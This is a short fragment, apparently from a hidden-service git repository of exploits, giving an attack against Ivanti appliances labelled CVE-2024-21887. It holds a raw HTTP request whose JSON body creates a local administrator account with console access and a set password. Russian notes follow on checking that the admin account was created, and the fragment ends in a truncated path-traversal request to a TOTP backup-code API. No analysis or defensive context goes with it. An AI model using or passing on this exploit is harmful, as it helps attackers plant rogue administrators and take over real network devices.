http://damaga377vyvydeqeuigxvl6g5sbmipoxb5nne6gpj3sisbnslbhvrqd.onion/git/bugtwix/exploits/src/branch/main/ivanti/CVE-2024-21887
/configuration/authentication/auth-servers/auth-server/Administrators/local/users/user HTTP/1.1
Host: X.X.X.X
Content-Type: application/json
Content-Length: 190
{"change-password-at-signin":"false","console-access":"true","enabled":"true","fullname":"XXX","one-time-use":"false","password-cleartext":"XXX","username":"XXX"} Проверяем и получаем список И отправляем GET и проверяем создалась ли админка GET /api/v1/totp/user-backup-code/../..